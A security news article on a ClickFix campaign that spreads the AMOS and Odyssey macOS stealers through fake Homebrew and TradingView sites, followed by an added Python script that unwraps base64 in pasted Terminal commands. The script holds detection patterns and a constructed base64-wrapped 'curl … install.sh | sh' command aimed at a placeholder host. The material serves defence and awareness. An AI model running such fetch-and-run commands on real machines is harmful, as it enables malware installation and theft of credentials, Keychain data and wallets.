A new malicious campaign is targeting Apple developers by leveraging fake websites mimicking legitimate platforms like Homebrew, LogMeIn, and TradingView. Security researchers have identified attackers distributing information-stealing malware, specifically AMOS and Odyssey, by deceiving users into running malicious commands directly in the Terminal.
The attackers use a tactic called ClickFix, which relies on users copying a command supplied by the website and pasting it directly into the Terminal. Researchers have identified over 85 domains used in the impersonation effort, including examples such as homebrewfaq.org and tradingviewen.com. Some of these fake sites use Google Ads to increase their visibility in search results.
The malicious websites present convincing download portals and installation instructions, including pre-formatted curl commands that users are prompted to paste into their Terminal. The sites often present what they copy as a legitimate Cloudflare validation ID, but what actually lands on the clipboard is a base64-encoded installation script. That script downloads and executes an install.sh file, bypassing security measures such as Gatekeeper. Once executed, the malware attempts to gain root privileges, collects system information, and disguises its activity by modifying system services and interacting with macOS XPC services. Finally, it harvests sensitive data, including browser cookies and credentials, cryptocurrency wallet extensions, Keychain data, and user files, which are then exfiltrated.
AMOS, first documented in April 2023, is now offered as Malware-as-a-Service (MaaS) with a reported monthly subscription cost of $1,000. Its operators have recently added persistent backdoor capabilities to the malware, granting attackers ongoing remote access. Odyssey Stealer, a relatively new family derived from Poseidon Stealer, was highlighted by CYFIRMA researchers this summer. It targets Chrome, Firefox, and Safari credentials, cryptocurrency wallet extensions, Keychain content, and personal files, exfiltrating the data in ZIP format.
Security experts strongly advise users, particularly developers and others comfortable with the Terminal, to verify the content of any command before executing it, especially commands found online. The campaign highlights the importance of caution with links that arrive through advertising and the need for regular system and browser backups. Organizations and individuals are encouraged to avoid executing Terminal commands from unknown sources, use strong UAC/Gatekeeper settings, and consult security professionals when they notice suspicious activity.
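The check that advice asks for, applied to the command shape described earlier, as an added example that is not from the article or the researchers it cites: decode any base64 embedded in a pasted one-liner and list what it would actually run before anything is executed. The sample command, its placeholder domain and the indicator patterns are constructed for illustration.

```python
import base64
import re

# Indicator patterns for the ClickFix shape the article describes (remote fetch
# piped into a shell, an install.sh dropper, base64 unwrapping, root requests,
# quarantine-flag removal). Constructed for illustration, not taken from the
# campaign's actual script.
SUSPICIOUS = [
    (r"curl\s[^|]*\|\s*(ba|z)?sh\b", "remote script piped into a shell"),
    (r"install\.sh", "install.sh dropper reference"),
    (r"base64\s+(-d|-D|--decode)", "decodes an embedded base64 payload"),
    (r"\bsudo\b", "requests root privileges"),
    (r"xattr\s+-d\s+com\.apple\.quarantine", "strips quarantine flag (Gatekeeper bypass)"),
]

B64_TOKEN = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")

def decode_embedded_base64(text: str) -> list[str]:
    """Return the text decodings of every base64-looking token in `text`."""
    decoded = []
    for token in B64_TOKEN.findall(text):
        try:
            raw = base64.b64decode(token, validate=True)
        except ValueError:  # not valid base64, e.g. a long plain word
            continue
        candidate = raw.decode("utf-8", errors="replace")
        if all(ch.isprintable() or ch in "\n\t" for ch in candidate):
            decoded.append(candidate)
    return decoded

def inspect_command(cmd: str) -> dict:
    """Unwrap nested base64 layers and collect the indicators seen in any layer,
    so a reviewer can read what a pasted command would really run."""
    layers, pending = [cmd], [cmd]
    while pending:
        for inner in decode_embedded_base64(pending.pop()):
            if inner not in layers:
                layers.append(inner)
                pending.append(inner)
    findings = {label for layer in layers
                for pattern, label in SUSPICIOUS if re.search(pattern, layer)}
    return {"layers": layers, "findings": sorted(findings)}

# Constructed sample in the shape the article describes; the inner command is
# encoded here rather than hand-typed so the blob is guaranteed to decode.
_PAYLOAD = "curl -fsSL https://example.invalid/install.sh | sh"
SAMPLE_COMMAND = "echo " + base64.b64encode(_PAYLOAD.encode()).decode() + " | base64 -d | sh"

if __name__ == "__main__":
    report = inspect_command(SAMPLE_COMMAND)
    for layer in report["layers"]:
        print("layer:   ", layer)
    print("findings:", report["findings"])
```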